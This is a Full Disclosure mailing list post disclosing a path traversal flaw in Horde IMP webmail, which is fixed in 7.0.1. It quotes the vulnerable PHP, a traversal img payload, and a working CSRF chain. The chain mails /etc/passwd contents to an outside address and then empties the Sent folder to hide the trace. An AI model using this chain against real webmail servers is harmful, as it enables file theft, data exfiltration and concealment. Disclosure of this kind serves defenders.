Full Disclosure mailing list archives
[fulldis] CVE-2026-58451 - Horde Groupware IMP path traversal vuln
From: ㅤevan via Fulldisclosure <fulldisclosure () seclists org>
Date: Fri, 3 Jul 2026 03:04:19 +1000
this is my first time sending to a mailing list so ive chosen
something easy. here goes:
Summary: Horde Groupware’s IMP Webmail solution contains a path
traversal/local file inclusion vulnerability which could be exploited
to escalate privileges or bypass authentication (through CSRF if
unauthenticated).
the vulnerability is in here:
} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
/* Check for smileys. They live in the JS directory, under
* the base ckeditor directory, so search for that and replace
* with the filesystem information if found (Request
* #13051). Need to ignore other image links that may have
* been explicitly added by the user. */
$js_path = strval(Horde::url($registry->get('jsuri',
'horde'), true));
if (stripos($src, $js_path . '/ckeditor') === 0) {
$file = str_replace(
$js_path,
$registry->get('jsfs', 'horde'),
$src
);
if (is_readable($file)) {
$data_part = new Horde_Mime_Part();
$data_part->setContents(file_get_contents($file));
...
as seen, we control $file, which is just the src in <img src="">. to
get past the checks to hit our file_get_contents sink, we can just
satisfy the stripos check. our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
this is likely very chainable with any other existing primitive to
achieve rce on horde IMP. for example, heres an easy csrf chain:
--
<!DOCTYPE html>
<html>
<body>
<h1>yo</h1>
<script>
var p1 = new FormData();
p1.append('to', 'john () evil gov');
// land in spam
p1.append('subject', 'hai');
p1.append('html', '1');
p1.append('message',
'<html><body>bye<img
src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
p1.append('identity', '0');
p1.append('priority', 'normal');
p1.append('request_read_receipt', '0');
p1.append('save_sent_mail', '1');
fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
method: 'POST',
body: p1,
credentials: 'include',
mode: 'no-cors'
})
.then(() => {
console.log("* bye");
setTimeout(() => {
var p2 = new FormData();
p2.append('mbox', 'U0VOVA'); // b64 SENT
// delete
fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
method: 'POST',
body: p2,
credentials: 'include',
mode: 'no-cors'
});
}, 2000);
});
</script>
</body>
</html>
--
PATCH:
update to horde imp 7.0.1 for the patch.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- [fulldis] CVE-2026-58451 - Horde Groupware IMP path traversal vuln ㅤevan via Fulldisclosure (Jul 02)
